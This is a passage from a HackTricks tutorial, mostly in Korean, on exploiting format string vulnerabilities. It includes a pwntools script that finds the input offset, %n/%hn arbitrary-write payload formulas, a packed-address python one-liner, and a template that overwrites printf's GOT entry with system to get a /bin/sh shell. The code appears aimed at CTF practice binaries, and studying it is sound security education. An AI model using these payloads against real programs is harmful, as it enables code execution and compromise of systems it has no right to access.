Format Strings

```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f"AAAA%{i}$x".encode()

Start a new process of the "chall" binary

p = process("./chall")

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output

if b"41414141" in output:

If the string is found, log the success message and break out of the loop

log.success(f"User input is at offset : {i}") break

Close the process

p.close()

</details>

### 유용성

임의 읽기는 다음과 같은 용도로 유용할 수 있습니다:

* **메모리에서** **바이너리**를 **덤프**하기
* **민감한** **정보**가 저장된 메모리의 특정 부분에 **접근**하기 (예: 이 [**CTF 챌린지**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)와 같이 카나리, 암호화 키 또는 사용자 정의 비밀번호)

## **임의 쓰기**

포맷터 **`%<num>$n`**은 **지정된 주소**에 **쓰기 바이트 수**를 **기록**합니다. 공격자가 printf를 사용하여 원하는 만큼의 문자를 쓸 수 있다면, 그는 **`%<num>$n`**을 사용하여 임의의 숫자를 임의의 주소에 쓸 수 있게 됩니다.

다행히도, 숫자 9999를 쓰기 위해 입력에 9999개의 "A"를 추가할 필요는 없으며, 대신 포맷터 **`%.<num-write>%<num>$n`**을 사용하여 **`<num-write>`** 숫자를 **`num` 위치가 가리키는 주소**에 쓸 수 있습니다.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

그러나 일반적으로 0x08049724와 같은 주소를 쓰기 위해 (한 번에 쓰기에는 엄청난 숫자임) **$hn**이 $n 대신 사용됩니다. 이는 2바이트만 쓸 수 있게 해줍니다. 따라서 이 작업은 주소의 가장 높은 2바이트와 가장 낮은 2바이트에 대해 각각 두 번 수행됩니다.

따라서 이 취약점은 임의의 주소에 무엇이든 쓸 수 있게 해줍니다.

이 예제에서 목표는 나중에 호출될 GOT 테이블의 함수의 주소를 덮어쓰는 것입니다. 이는 다른 임의 쓰기를 악용하여 exec 기술을 사용할 수 있습니다:

우리는 사용자로부터 인수를 받는 함수를 덮어쓰고, 이를 system 함수를 가리키게 할 것입니다. 언급했듯이 주소를 쓰기 위해서는 일반적으로 2단계가 필요합니다: 먼저 주소의 2바이트를 쓰고, 그 다음에 나머지 2바이트를 씁니다. 이를 위해 **$hn**이 사용됩니다.

• HOB는 주소의 2개의 높은 바이트를 호출합니다.

• LOB는 주소의 2개의 낮은 바이트를 호출합니다.

그런 다음, 포맷 문자열의 작동 방식 때문에 먼저 더 작은 [HOB, LOB]를 쓰고 그 다음에 다른 것을 써야 합니다.

HOB < LOB [address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

HOB > LOB [address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Pwntools 템플릿

이러한 종류의 취약점을 위한 익스플로잇을 준비하기 위한 템플릿은 다음에서 찾을 수 있습니다:

또는 여기에서 이 기본 예제를 확인하세요:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Format Strings to BOF

형식 문자열 취약점의 쓰기 작업을 악용하여 스택의 주소에 쓰기 및 버퍼 오버플로우 유형의 취약점을 악용할 수 있습니다.

Other Examples & References

• https://ir0nstone.gitbook.io/notes/types/stack/format-string

• https://www.youtube.com/watch?v=t1LH9D5cuK4

• https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

• https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html

• 32 비트, no relro, no canary, nx, no pie, 스택에서 플래그를 유출하기 위한 형식 문자열의 기본 사용 (실행 흐름을 변경할 필요 없음)

• https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html

• 32 비트, relro, no canary, nx, no pie, win 함수로 fflush 주소를 덮어쓰는 형식 문자열 (ret2win)

• https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html

• 32 비트, relro, no canary, nx, no pie, .fini_array 내의 main에 있는 주소를 쓰기 위한 형식 문자열 (흐름이 한 번 더 루프됨) 및 strlen을 가리키는 GOT 테이블의 system 주소를 쓰기. 흐름이 main으로 돌아가면, strlen이 사용자 입력으로 실행되고 system을 가리키면, 전달된 명령이 실행됩니다.

해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 우리는 인재를 모집합니다! (유창한 폴란드어 필기 및 구사 필수).

HackTricks 지원하기

• 구독 계획 확인하기!

• **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.

• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.